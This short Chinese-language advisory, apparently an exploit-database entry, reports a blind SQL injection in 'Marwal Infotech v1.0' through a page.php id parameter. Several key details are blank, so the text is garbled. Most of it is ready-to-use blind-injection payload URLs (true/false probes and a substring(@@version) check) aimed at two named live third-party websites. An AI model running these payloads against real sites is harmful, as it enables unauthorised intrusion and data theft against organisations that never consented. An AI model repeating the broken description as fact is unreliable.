关键信息 漏洞名称 Blind SQL Injection Vulnerability 目标软件 Marwal Infotech v1.0 Vendor: https://marwalinfotech.com/ 漏洞类型 Category: webapps 测试环境 Tested On: mac, Firefox 漏洞描述 Marwal Infotech v1.0 在 文件的 参数中存在 SQL 注入漏洞。 漏洞利用方法 在 URL 的末尾添加 和 来测试盲注: - - 示例链接 Demo 1: - https://www.tagorettcollege.com/page.php?id=23%20and%20true-- - https://www.tagorettcollege.com/page.php?id=23%20and%20false-- - https://www.tagorettcollege.com/page.php?id=23%20and%20substring(@@version,1,1)=1--=1--) Demo 2: - https://www.gpsgotan.co.in/page.php?id=61%20and%20true-- - https://www.gpsgotan.co.in/page.php?id=61%20and%20false-- - https://www.gpsgotan.co.in/page.php?id=61%20and%20substring(@@version,1,1)=1--=1--)